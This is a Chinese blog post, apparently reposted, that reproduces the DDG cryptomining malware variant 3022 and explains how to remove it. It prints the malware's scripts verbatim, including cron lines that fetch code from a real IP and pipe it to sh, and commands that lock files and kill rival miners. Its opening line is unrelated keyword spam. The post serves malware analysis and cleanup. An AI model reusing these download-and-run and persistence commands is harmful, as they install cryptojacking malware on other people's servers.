做网站开发的笔记本配置,北京建设职工大学网站,网页设计一个月工资多少,济南网上房地产本篇文章主要根据360Netlab新出的DDG分析文档来复现新变种3022#xff0c;会涉及部分分析和清除的方法#xff0c;本篇文章只用于学习交流#xff0c;为广大受害者提供清除思路 #xff0c;请勿用于非法用途#xff0c;产生一切后果与作者无关 详情请参考文档#xff1a;… 本篇文章主要根据360Netlab新出的DDG分析文档来复现新变种3022会涉及部分分析和清除的方法本篇文章只用于学习交流为广大受害者提供清除思路 请勿用于非法用途产生一切后果与作者无关 详情请参考文档https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/ 一、下载 下载脚本http://119.9.106.27:8000/i.shi.sh名称位ddgs一贯的作风 样本地址119.9.106.27:8000/static/3022/ 首先下载i.sh脚本分析下里边的内容 export PATH$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho */15 * * * * (curl -fsSL http://119.9.106.27:8000/i.sh||wget -q -O- http://119.9.106.27:8000/i.sh) | sh | crontab -echo /var/spool/cron/rootecho */15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh /var/spool/cron/rootmkdir -p /var/spool/cron/crontabs
echo /var/spool/cron/crontabs/rootecho */15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh /var/spool/cron/crontabs/rootcd /tmp
touch /usr/local/bin/writeable cd /usr/local/bin/
touch /usr/libexec/writeable cd /usr/libexec/
touch /usr/bin/writeable cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeableexport PATH$PATH:$(pwd)
ps auxf | grep -v grep | grep lrnbbce || rm -rf lrnbbce
if [ ! -f lrnbbce ]; thenwget -q http://119.9.106.27:8000/static/3022/ddgs.$(uname -m) -O lrnbbcefi
chmod x lrnbbce
$(pwd)/lrnbbce || /usr/bin/lrnbbce || /usr/libexec/lrnbbce || /usr/local/bin/lrnbbce || lrnbbce || ./lrnbbce || /tmp/lrnbbceps auxf | grep -v grep | grep lrnbbcb | awk {print $2} | xargs kill -9
ps auxf | grep -v grep | grep lrnbbcc | awk {print $2} | xargs kill -9
ps auxf | grep -v grep | grep lrnbbcd | awk {print $2} | xargs kill -9 ddg木马的老套路了写环境变量、添加到定时任务、下载矿机执行、删除禁用其他挖矿木马(挖矿行业竞争很激烈了)从3014版本开始增加了云端配置下发 disable.sh 来集中干掉竞争对手脚本地址http://119.9.106.27:8000/static/disable.sh内容如下 export PATH$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinmkdir -p /opt/yilu/work/{xig,xige} /usr/bin/bsd-port
touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64
chmod -w /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port
chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64
chattr i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64rm -rf /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
touch /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
chmod -rw /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
chattr i /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinuxif [ -e /tmp/gates.lod ]; thenrm -rf $(readlink /proc/$(cat /tmp/gates.lod)/exe)kill -9 $(cat /tmp/gates.lod)rm -rf $(readlink /proc/$(cat /tmp/moni.lod)/exe)kill -9 $(cat /tmp/moni.lod)rm -rf /tmp/{gates,moni}.lod
fips auxf | grep -v grep | grep /tmp/thisxxs | awk {print $2} | xargs kill -9
ps auxf | grep -v grep | grep /opt/yilu/work/xig/xig | awk {print $2} | xargs kill -9
ps auxf | grep -v grep | grep /opt/yilu/mservice | awk {print $2} | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk {print $2} | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk {print $2} | xargs kill -9把同类的挖矿进程放到了这个脚本中来杀掉yilu、以及BillGate家族的gates进程等不过这都是之前版本的现在这个更高级了直接下发二进制程序disable 这个disable的作用可以参考下360的那篇文章图片来自360netlab博客 目前为了阻止其它挖矿程序ddg3022主要做了以下措施1.修改Hosts文件阻止其它挖矿程序的下发 2.杀掉其它挖矿程序3.使用二进制文件disable 二、运行复现 接下来执行脚本开始我们的复现过程 crontab已经写入 CPU已经满载挖矿程序已经在运行 看下/tmp目录下的样本文件 三、清除 老套路挖矿木马干什么咱们反着来就是了 删除/var/spool/cron/crontab/root/var/spool/cron/root文件中 echo */15 * * * * curl -fsSL http://119.9.106.27:8000/i.sh | sh /var/spool/cron/root 删除/tmp/6Tx3Wq,/tmp/disable,/usr/bin/lrnbbce kill掉进程6Tx3Wqlrnbbce 此时挖矿程序已经清理后续可以删除被增加的hosts等文件 参考文章 https://blog.netlab.360.com/https-blog-netlab-360-com-a-fast-ddg-3014-analyze/https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/ 转载于:https://www.cnblogs.com/Id3al/p/10706324.html
